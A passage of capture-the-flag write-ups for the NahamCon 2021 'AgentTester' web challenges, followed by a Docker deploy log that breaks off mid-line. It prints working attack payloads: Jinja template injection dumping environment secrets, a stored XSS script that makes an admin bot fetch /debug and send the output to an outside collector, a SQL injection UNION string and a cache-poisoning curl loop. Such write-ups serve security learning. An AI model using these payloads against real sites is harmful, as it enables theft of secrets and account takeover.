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) It was! So at this point we're admin in this web application that presents itself as some sort of testing service that will go to certain web pages (stored in the database) using a certain user agent... great, but where could the flag be? I was thinking it was going to be some form of SSRF where we need to make the applcication visit one of our URLs by editing the entry in the database somehow... but really we should resort to looking in the source code that we have! We could have done this more at the start but it's always fun to see what we can deduce just from the front-end. However, we did look at the `/req` endpoint in `app.py` earlier, and when we did you might have noticed there is one endpoint defined in that file that we have not been to: `/debug`. ```[email protected]("/debug", methods=["POST"])def debug(): sessionID = session.get("id", None) if sessionID == 1: code = request.form.get("code", "<h1>Safe Debug</h1>") return render_template_string(code) else: return "Not allowed."``` It would appear the `/debug` endpoint allows only the `admin` user to pass an arbitrary [jinja template string](https://flask.palletsprojects.com/en/1.1.x/tutorial/templates/#:~:text=Flask%20uses%20the%20Jinja%20template,is%20rendered%20in%20HTML%20templates.) in the POST body of a request, and the server will render that. This is big! We're lucky enough to be able to log in as `admin` and so can use this endpoint. But what should we pass? Well if we search the source code for "flag" you may notice the line `export CHALLENGE_NAME="AgentTester" && export CHALLENGE_FLAG="<REDACTED>"` in `run.sh` line 9. So it seems we need to get the value of that environment variable! If we had no idea on how to do this in Jinja we could search the web to find some suggestions (*eg* leaking classes, `{{config.__class__.__init__.__globals__['os'].environ}}`), but a good place to start might be instead to just look at the other environment variable `CHALLENGE_NAME` and see if that is used anywhere in the code. Indeed we see in the `base.html` file in `default_templates` that value is used in line 21 using the following syntax: `<title>{{ environ("CHALLENGE_NAME", "Test") }}</title>`. Digging around a bit more (or relying on prior knowledge of Jinja) you may notice `environ` is actually just a global set up on line 25 of `backend.py` by `app.jinja_env.globals.update(environ=os.environ.get)`, so really it's just a call to python's `os.environ.get`. Armed with that knowledge, let's try just get the whole environment ```jsfetch("http://challenge.nahamcon.com:30169/debug", { "headers": { "content-type": "application/x-www-form-urlencoded" }, "body": "code={{environ}}", "method": "POST", "mode": "cors", "credentials": "include"});``` ```<bound method Mapping.get of environ({ 'KUBERNETES_SERVICE_PORT_HTTPS': '443', 'KUBERNETES_SERVICE_PORT': '443', 'BASE_URL': 'challenge.nahamcon.com', 'HOSTNAME': 'agenttester-de2669c0c79b37b9-5675b899f6-v52vp', 'PYTHON_VERSION': '3.8.8', 'PWD': '/app', 'PORT': '', 'ADMIN_BOT_USER': 'admin', 'HOME': '/root', 'LANG': 'C.UTF-8', 'KUBERNETES_PORT_443_TCP': 'tcp://10.116.0.1:443', 'CHALLENGE_NAME': 'AgentTester', 'GPG_KEY': 'E3FF2839C048B25C084DEBE9B26995E310250568', 'SHLVL': '1', 'KUBERNETES_PORT_443_TCP_PROTO': 'tcp', 'PYTHON_PIP_VERSION': '21.0.1', 'KUBERNETES_PORT_443_TCP_ADDR': '10.116.0.1', 'PYTHON_GET_PIP_SHA256': 'c3b81e5d06371e135fb3156dc7d8fd6270735088428c4a9a5ec1f342e2024565', 'KUBERNETES_SERVICE_HOST': '10.116.0.1', 'KUBERNETES_PORT': 'tcp://10.116.0.1:443', 'KUBERNETES_PORT_443_TCP_PORT': '443', 'PYTHON_GET_PIP_URL': 'https://github.com/pypa/get-pip/raw/b60e2320d9e8d02348525bd74e871e466afdf77c/get-pip.py', 'PATH': '/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin', 'ADMIN_BOT_PASSWORD': '*)(@skdnaj238374834**__**=', 'CHALLENGE_FLAG': 'flag{fb4a87cfa85cf8c5ab2effedb4ea7006}', '_': '/usr/local/bin/uwsgi', 'UWSGI_RELOADS': '0', 'UWSGI_ORIGINAL_PROC_NAME': 'uwsgi'})>``` And we have our flag on line 26! `flag{fb4a87cfa85cf8c5ab2effedb4ea7006}`. ## Version 2 Solution In **AgentTester V2** the only difference is that the password for the `admin` account is no longer stored as plaintext in the database, rather it is a bcrypt blowfish hash. Looking at the format of the plain text hash in V1, we are not expected to crack the hash. So how can we use the `/debug` endpoint if we no longer have access to the `admin` account? The only remaining tool in our belt is that XSS vulnerability on the profile page, so it must be that! The tool itself sends the admin bot to certain URLs so if we could send them to our profile page we could include a CSRF in the page using the 'About' section and exfiltrate the flag that way! Using what we know we could set our About section to the following. ```html"><script> fetch('/debug', { method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{environ}}" }) .then(response => response.text()) .then(data => fetch("https://requestbin.io/19ydl6f1?flag="+encodeURIComponent(data)));</script>
# AgentTester ## Description We've recently hired an entry-level web developer to build an internal system to test User Agents, let us know if you find any error! ## Writeups * [Solver](https://gist.github.com/jorgectf/d6a01fa0d8ba3905196b9b41a78ab4d1)* [Juanan](https://ikasten.io/2021/03/15/nahamcon2021-ctf-agenttester-challenge-writeup/)* [lanjelot](https://thegoonies.github.io/2021/03/15/nahamconctf-2021-agent-tester-v2/)* [b4bergi](https://github.com/b4bergi/ctf-writeups/blob/main/nahamcon-2021/AgentTesterV2.md) ## Solution * Create an account* Go to Profile* Inject in About -> (SSTI can be abused using "environ" because of backend.py:25 or leaking classes until reading /proc/self/environ or running "env")```"><script>fetch('/debug', {method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{ environ }}"}) .then(response => response.text()) .then(data => fetch("http://your-server/?flag="+encodeURIComponent(data)));</script>```* Go to index and send `' UNION SELECT 'NotARandomString', 'http://nginx/profile/<your-id>' -- ` (Leaving an authed curl fetching `/profile/<your-id>` with UA `NotARandomString` for the cache to make the bot able to visit your profile)```while true; do curl -I chall-ip/profile/<your-id> -b "auth=<your-auth>" -H "User-Agent: NotARandomString"; sleep 1; done```* Wait for the bot to visit `http://nginx/profile/<your-id>` (cached aka `X-Cache-Status: HIT`), execute that JS and receive the flag in your server. ## Expected behaviour```/AgentTester# ./deploy.sh Removing agenttester_nginx_1 ... doneRemoving agenttester_browser_1 ... doneRemoving agenttester_app_1 ... doneRemoving agenttester_redis_1 ... doneRemoving agenttester_mysql_1 ... doneRemoving agenttester_chrome_1 ... doneRemoving network agenttester_defaultRemoving network agenttester_isolatedCreating network "agenttester_default" with driver "bridge"Creating network "agenttester_isolated" with driver "bridge"Building browserStep 1/6 : FROM python:3.8-slim ---> 5bacf0a78697Step 2/6 : WORKDIR /browser ---> Using cache ---> b69997efc8abStep 3/6 : COPY browser.py . ---> Using cache ---> 7bfc7a59b663Step 4/6 : COPY requirements.txt . ---> Using cache ---> db141606dbb9Step 5/6 : RUN pip3 install --no-cache-dir -r requirements.txt ---> Using cache ---> febce98df953Step 6/6 : ENTRYPOINT python3 -u browser.py ---> Using cache ---> 0f50f0c93a13 Successfully built 0f50f0c93a13Successfully tagged agenttester_browser:latestBuilding appStep 1/6 : FROM python:3.8-slim ---> 5bacf0a78697Step 2/6 : RUN apt update -y && apt install gcc libssl-dev -y ---> Using cache ---> 5e0b8c3dd651Step 3/6 : WORKDIR /app ---> Using cache ---> e97cf7e9df37Step 4/6 : COPY app/ . ---> 897df4750d20Step 5/6 : RUN pip3 install --no-cache-dir -r requirements.txt ---> Running in 93a089653803Collecting uwsgi Downloading uWSGI-2.0.19.1.tar.gz (803 kB)Collecting click Downloading click-7.1.2-py2.py3-none-any.whl (82 kB)Collecting Flask Downloading Flask-1.1.2-py2.py3-none-any.whl (94 kB)Collecting Flask-SQLAlchemy Downloading Flask_SQLAlchemy-2.4.4-py2.py3-none-any.whl (17 kB)Collecting itsdangerous Downloading itsdangerous-1.1.0-py2.py3-none-any.whl (16 kB)Collecting Jinja2 Downloading Jinja2-2.11.3-py2.py3-none-any.whl (125 kB)Collecting MarkupSafe Downloading MarkupSafe-1.1.1-cp38-cp38-manylinux2010_x86_64.whl (32 kB)Collecting pyotp Downloading pyotp-2.6.0-py2.py3-none-any.whl (11 kB)Collecting SQLAlchemy Downloading SQLAlchemy-1.3.23-cp38-cp38-manylinux2010_x86_64.whl (1.3 MB)Collecting Werkzeug Downloading Werkzeug-1.0.1-py2.py3-none-any.whl (298 kB)Collecting pymysql Downloading PyMySQL-1.0.2-py3-none-any.whl (43 kB)Collecting gevent Downloading gevent-21.1.2-cp38-cp38-manylinux2010_x86_64.whl (6.3 MB)Collecting Flask-uWSGI-WebSocket Downloading Flask-uWSGI-WebSocket-0.6.1.tar.gz (10 kB)Collecting redis Downloading redis-3.5.3-py2.py3-none-any.whl (72 kB)Collecting greenlet<2.0,>=0.4.17 Downloading greenlet-1.0.0-cp38-cp38-manylinux2010_x86_64.whl (165 kB)Collecting zope.interface Downloading zope.interface-5.2.0-cp38-cp38-manylinux2010_x86_64.whl (244 kB)Requirement already satisfied: setuptools in /usr/local/lib/python3.8/site-packages (from gevent->-r requirements.txt (line 12)) (53.0.0)Collecting zope.event Downloading zope.event-4.5.0-py2.py3-none-any.whl (6.8 kB)Building wheels for collected packages: Flask-uWSGI-WebSocket, uwsgi Building wheel for Flask-uWSGI-WebSocket (setup.py): started Building wheel for Flask-uWSGI-WebSocket (setup.py): finished with status 'done' Created wheel for Flask-uWSGI-WebSocket: filename=Flask_uWSGI_WebSocket-0.6.1-py3-none-any.whl size=10798 sha256=efd651f8b60dad3809592564019aff438b70d03b9a250d75500fb2be7461106d Stored in directory: /tmp/pip-ephem-wheel-cache-bj2g851b/wheels/6b/c0/63/5388603d2fc50fac319d36e5db4e5ed3d0ce8c11097bcd416a Building wheel for uwsgi (setup.py): started Building wheel for uwsgi (setup.py): finished with status 'done' Created wheel for uwsgi: filename=uWSGI-2.0.19.1-cp38-cp38-linux_x86_64.whl size=536631 sha256=9836679f2776a66fcbf8a9076c0e101841e798a02bb964345ee0cd2ab266b9a9 Stored in directory: /tmp/pip-ephem-wheel-cache-bj2g851b/wheels/87/01/0f/2fc9c74a1ae010de7d8b17d90f6b39595cbb8ac5169345fcb8Successfully built Flask-uWSGI-WebSocket uwsgiInstalling collected packages: MarkupSafe, Werkzeug, Jinja2, itsdangerous, click, zope.interface, zope.event, uwsgi, SQLAlchemy, greenlet, Flask, redis, pyotp, pymysql, gevent, Flask-uWSGI-WebSocket, Flask-SQLAlchemy Successfully installed Flask-1.1.2 Flask-SQLAlchemy-2.4.4 Flask-uWSGI-WebSocket-0.6.1 Jinja2-2.11.3 MarkupSafe-1.1.1 SQLAlchemy-1.3.23 Werkzeug-1.0.1 click-7.1.2 gevent-21.1.2 greenlet-1.0.0 itsdangerous-1.1.0 pymysql-1.0.2 pyotp-2.6.0 redis-3.5.3 uwsgi-2.0.19.1 zope.event-4.5.0 zope.interface-5.2.0Removing intermediate container 93a089653803 ---> 9842058caa56Step 6/6 : ENTRYPOINT uwsgi --ini app.ini ---> Running in 81d8bc2e921cRemoving intermediate container 81d8bc2e921c ---> b14a0cff8218 Successfully built b14a0cff8218Successfully tagged agenttester_app:latestCreating agenttester_redis_1 ... doneCreating agenttester_mysql_1 ... doneCreating agenttester_chrome_1 ... doneCreating agenttester_app_1 ... doneCreating agenttester_browser_1 ... doneCreating agenttester_nginx_1 ... doneAttaching to agenttester_mysql_1, agenttester_chrome_1, agenttester_redis_1, agenttester_browser_1, agenttester_app_1, agenttester_nginx_1app_1 | [uWSGI] getting INI configuration from app.iniapp_1 | *** Starting uWSGI 2.0.19.1 (64bit) on [Sat Feb 27 23:15:20 2021] ***app_1 | compiled with version: 8.3.0 on 27 February 2021 23:15:03app_1 | os: Linux-4.19.84-microsoft-standard #1 SMP Wed Nov 13 11:44:37 UTC 2019app_1 | nodename: 2c63f1a0aabdapp_1 | machine: x86_64app_1 | clock source: unixapp_1 | detected number of CPU cores: 4app_1 | current working directory: /appapp_1 | detected binary path: /usr/local/bin/uwsgiapp_1 | !!! no internal routing support, rebuild with pcre support !!!app_1 | setuid() to 65534app_1 | your memory page size is 4096 bytesapp_1 | *** WARNING: you have enabled harakiri without post buffering. Slow upload could be rejected on post-unbuffered webservers ***app_1 | detected max file descriptor number: 1048576app_1 | - async cores set to 1000 - fd table size: 1048576app_1 | lock engine: pthread robust mutexesapp_1 | thunder lock: disabled (you can enable it with --thunder-lock)mysql_1 | 2021-02-27 23:15:18+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.23-1debian10 started.mysql_1 | 2021-02-27 23:15:18+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'mysql_1 | 2021-02-27 23:15:18+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.23-1debian10 started.mysql_1 | 2021-02-27 23:15:18+00:00 [Note] [Entrypoint]: Initializing database filesmysql_1 | 2021-02-27T23:15:18.803867Z 0 [System] [MY-013169] [Server] /usr/sbin/mysqld (mysqld 8.0.23) initializing of server in progress as process 46mysql_1 | 2021-02-27T23:15:18.811155Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started. chrome_1 | 2021-02-27 23:15:18,920 INFO Included extra file "/etc/supervisor/conf.d/selenium.conf" during parsingapp_1 | uWSGI http bound on 0.0.0.0:4000 fd 4app_1 | uwsgi socket 0 bound to TCP address 127.0.0.1:44989 (port auto-assigned) fd 3app_1 | Python version: 3.8.8 (default, Feb 19 2021, 18:07:06) [GCC 8.3.0]nginx_1 | /docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration nginx_1 | /docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/nginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.shapp_1 | Python main interpreter initialized at 0x559eb2fe5dd0app_1 | python threads support enabledapp_1 | your server socket listen backlog is limited to 100 connectionsapp_1 | your mercy for graceful operations on workers is 3600 secondsnginx_1 | 10-listen-on-ipv6-by-default.sh: info: /etc/nginx/conf.d/default.conf is not a file or does not existapp_1 | mapped 21036928 bytes (20543 KB) for 1000 coresapp_1 | *** Operational MODE: async ***nginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.shnginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.shchrome_1 | 2021-02-27 23:15:18,922 INFO supervisord started with pid 8mysql_1 | 2021-02-27T23:15:19.656898Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended. nginx_1 | /docker-entrypoint.sh: Configuration complete; ready for start upredis_1 | 1:C 27 Feb 2021 23:15:19.033 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Ooredis_1 | 1:C 27 Feb 2021 23:15:19.033 # Redis version=6.2.0, bits=64, commit=00000000, modified=0, pid=1, just startedredis_1 | 1:C 27 Feb 2021 23:15:19.033 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.confchrome_1 | 2021-02-27 23:15:19,924 INFO spawned: 'xvfb' with pid 10chrome_1 | 2021-02-27 23:15:19,925 INFO spawned: 'selenium-standalone' with pid 11chrome_1 | 23:15:20.137 INFO [GridLauncherV3.parse] - Selenium server version: 3.141.59, revision: e82be7d358 chrome_1 | 2021-02-27 23:15:20,139 INFO success: xvfb entered RUNNING state, process has stayed up for > than 0 seconds (startsecs)chrome_1 | 2021-02-27 23:15:20,139 INFO success: selenium-standalone entered RUNNING state, process has stayed up for > than 0 